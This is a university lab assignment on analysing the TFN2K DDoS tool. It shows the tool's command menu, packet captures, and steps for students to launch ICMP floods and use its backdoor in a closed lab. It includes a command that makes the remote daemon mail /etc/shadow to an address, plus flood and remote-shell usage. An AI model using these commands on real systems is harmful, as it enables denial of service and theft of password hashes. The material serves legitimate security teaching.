Assignments of day 5 in week #3

Distributed Denial-Of-Service (DDoS):TFN2K - An Analysis

• Attack model

  The client program tfn running on the Client sending commands to its server nodes which are running a server prgrom td. The ccommunication between the client and server nodes are encrypted with CAST 256 alorgthim (key length from 128 to 256). The communication packets are using random sourc IP via TCP , UDP and ICMP protocol. Hence, the communication is one way from client to server nodes.

  Once the server nodes recieve the commands from thier client, they commence the flood attack.

  TNF2K proives the following attacks:

  UDP flood, usage: -i victim@victim2@victim3@... TCP/SYN flood, usage: -i victim@... [-p destination port] ICMP/PING flood, usage: -i victim@... ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@... MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@... TARGA3 flood (IP stack penetration), usage: -i victim@.. The attack packets to the victim are also using random source IP. Hence, it is difficult to trace the originity of the attack even sniffering the attack packages. *----------* | | | Attacker | | | *----------* | | *----------* | | | Client | | | *----------* | (commands to nodes) | *------------*------*------*------------* | | | | | | | | v v v v *----------* *----------* *----------* *----------* | | | | | | | | | Node | | Node | | Node | | Node | | | | | | | | | *----------* *----------* *----------* *----------* \ \ / / \ \ / / \ \ / / (any number of floods or attacks) \ \ / / \ \ / / \ \ / / V V V *-----------------------* | | | Victim | | | *-----------------------*
• The Command menu of the client tfn
  root@iegatea0 tfn2k]# ./tfn usage: ./tfn [-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP. Uses a random protocol as default [-D n] Send out n bogus requests for each real one to decoy targets [-S host/ip] Specify your source IP. Randomly spoofed by default, you need to use your real IP if you are behind spoof-filtering routers [-f hostlist] Filename containing a list of hosts with TFN servers to contact [-h hostname] To contact only a single host running a TFN server [-i target string] Contains options/targets separated by '@', see below [-p port] A TCP destination port can be specified for SYN floods <-c command ID> 0 - Halt all current floods on server(s) immediately 1 - Change IP antispoof-level (evade rfc2267 filtering) usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed) 2 - Change Packet size, usage: -i 3 - Bind root shell to a port, usage: -i 4 - UDP flood, usage: -i victim@victim2@victim3@... 5 - TCP/SYN flood, usage: -i victim@... [-p destination port] 6 - ICMP/PING flood, usage: -i victim@... 7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@... 8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@... 9 - TARGA3 flood (IP stack penetration), usage: -i victim@... 10 - Blindly execute remote shell command, usage -i command The communication packtets between the client and server nodes are using random source IP. [root@iegatea0 ~]# tcpdump host ntec1 10:25:29.858622 eth0 > 53.165.192.0.22668 > 137.189.99.81.64952: S 0:47(47) win 5093 10:25:29.879226 eth0 > 53.165.192.0.6798 > 137.189.99.81.53721: udp 30 10:25:29.899051 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.919050 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.939055 eth0 > 53.165.192.0.17166 > 137.189.99.81.16226: udp 30 10:25:29.959076 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:29.979260 eth0 > 53.165.192.0.16704 > 137.189.99.81.40553: . 339790:339837(47) ack 0 win 0 10:25:29.999074 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.019075 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.039048 eth0 > 53.165.192.0.4810 > 137.189.99.81.3467: udp 30 10:25:30.059291 eth0 > 53.165.192.0.25373 > 137.189.99.81.58732: S 4707273:4707320(47) ack 11500271 win 32087 10:25:30.079044 eth0 > 53.165.192.0.46691 > 137.189.99.81.3017: udp 30 10:25:30.099208 eth0 > 53.165.192.0.50047 > 137.189.99.81.14998: . 0:47(47) ack 0 win 50064 10:25:30.119105 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.139040 eth0 > 53.165.192.0.18898 > 137.189.99.81.64259: udp 30 10:25:30.159230 eth0 > 53.165.192.0.44591 > 137.189.99.81.41979: S 9902919:9902966(47) ack 0 win 55543 10:25:30.179037 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.199090 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.219062 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply 10:25:30.239121 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply The command messages in the communciation packets between the client and master nodes are encrypted by CAST 256. BTW, there is a signature of these packets -- 0x41 at the end of each packtes. [root@iegatea0 ~]# tcpdump -x host ntec1 Kernel filter, protocol ALL, datagram packet socket tcpdump: listening on all devices 10:25:53.368639 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply 4500 0037 e8a6 0000 dd01 f73a 13d5 fd00 89bd 6351 0000 a8ef 0c21 7e9d 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.387922 eth0 > 19.213.253.0.58890 > 137.189.99.81.23376: udp 30 4500 0037 76a4 0000 d911 6d2d 13d5 fd00 89bd 6351 e60a 5b50 0026 f252 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.407935 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply 4500 0037 90a4 0000 ca01 623d 13d5 fd00 89bd 6351 0000 2848 0b66 0000 2b54 4473 ??? from here until ???END lines may have been inserted/deleted 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41 10:25:53.428187 eth0 > 19.213.253.0.24765 > 137.189.99.81.26175: S 11886646:11886693(47) win 23580 4500 0043 bc99 0000 d906 2737 13d5 fd00 89bd 6351 60bd 663f 00b5 6036 00dd 7e9b 0002 5c1c 302f 0000 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41
• The Attack Examples:

  ICMP flood attack

  [root@iegatea0 tfn2k]# ./tfn -h ntec1 -c 6 -i 137.189.96.18@ Protocol : random Source IP : random Client input : single host Target(s) : 137.189.96.18@ Command : commence icmp echo flood The server node (ntec1 in this example) generate enormous ICMP flood to the victim with the random faked source IP.

  tcpdump does not show all the no. of these packets due to packets drop in the network interface but the swtich record down the traffic.

  Server node port traffic
  

  [root@ntec1 tfn2k]# tcpdump host iest18 Kernel filter, protocol ALL, datagram packet socket tcpdump: listening on all devices 10:09:51.357753 eth0 > 30.12.188.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.358864 eth0 > 115.158.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.358949 eth0 > 42.57.217.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359031 eth0 > 63.90.55.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359113 eth0 > 83.28.81.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.359195 eth0 > 232.168.136.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360206 eth0 > 58.77.151.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360297 eth0 > 132.1.61.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360380 eth0 > 182.190.60.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360462 eth0 > 48.15.118.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360544 eth0 > 204.59.230.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360625 eth0 > 239.123.23.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360707 eth0 > 109.51.39.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360788 eth0 > 23.183.134.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360869 eth0 > 43.158.42.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.360951 eth0 > 187.232.84.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361032 eth0 > 218.98.7.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361121 eth0 > 217.7.176.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361204 eth0 > 102.143.242.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361286 eth0 > 115.58.37.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0] 10:09:51.361368 eth0 > 12.11.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
• Victim loading

  Before the attack, the CPU is over 90% idle

  last pid: 469; load averages: 1.41, 0.86, 0.55 10:51:10 44 processes: 42 sleeping, 1 running, 1 on cpu CPU states: 97.4% idle, 0.2% user, 2.0% kernel, 0.4% iowait, 0.0% swap Memory: 64M real, 2684K free, 328M swap free During the attack, the CPU Kernel loading shot up to 85% last pid: 469; load averages: 1.67, 0.82, 0.53 10:52:16 44 processes: 42 sleeping, 1 running, 1 on cpu CPU states: 14.4% idle, 0.2% user, 85.1% kernel, 0.4% iowait, 0.0% swap Memory: 64M real, 3316K free, 328M swap free

Assignments

Post all your answers and works on your web page

Please do this assignment very carefully

1. Start up the TFN daemon at your partner host and capture the ICMP package by the cap1 script

ntec16-36:/tmp> /usr/local2/wsh/ddos/cap1
td: no process killed
tcpdump: listening on eth0

2. TFN backdoor (Semi-interactive access)
1. As your host, try to control your partner host via the TFN backddor. Command your TFN to send you the shadow password file to you.

cd /usr/local2/wsh/ddos
 ./tfn -h your_partner_host -c 10 -i "/bin/cat /etc/shadow|/bin/mail your_email@ie.cuhk.edu.hk"

2. Check the tcpdump in step 1. What is the IP, protocol of tcpdump traffic? Are the packet data encrypted? How many shadow password emails do you receive from your TFN server (i.e. your partner host)? Post the tcpdump and your findings on your web pages.
3. If you still cannot recieve the /etc/shadow information by mail, repeat step 1.
4. Hit CTRL-C to terminate your tcpdump at your host.
3. Launch the DOS attack to your host
1. tcpdump 10000 icmp packet to /tmp/ddos.dump by the cap2 script at your partner host

ntec16-36:/tmp> /usr/local2/wsh/ddos/cap2
td: no process killed
tcpdump: listening on eth0

2. At your host, command your TFN at the partner host to launch a ICMP DOS attack to your host

./tfn -h your_partner_host -c 6 -i your_host_IP@

Note. Actually this attack will not reach your host because our NTEC router has blocked them all.
However, you can measue the attack at the TFN server (i.e. your partner host) by the tcpdump in step II.

After a second, the tcpdump at your host should be finished and the tcpdump file,
/tmp/ddos.dump, with 10000 icmp packets should be created.

Repeat this steps serveral times so as to make sure the TFN server has received your command
3. Kill your TFN daemon at your and partner host


Make sure you kill the TFN daemon at your and your partner host

/usr/local2/wsh/ddos/killd

4. Analyze the tcpdump file

Use snort or tcpdump to figure out the attack output rate (i.e. How many DOS attack packets per seconds). You can get it from the packet time stamp. For example,

tcpdump -nr /tmp/ddos.dump |head -100
tcpdump -nr /tmp/ddos.dump |tail -100

What spoofing IP did the attack use?

Post all your findings on your web pages

• DDoS TFN2K - An Analysis (from IEG7006 course material)

• Report on the Incident of CUHK Campus Network ICMP Flooding on 12th November 2000

• http://packetstorm.linuxsecurity.com/distributed/TFN2k_Analysis-1.3.txt

• http://www.sans.org/dosstep/index.htm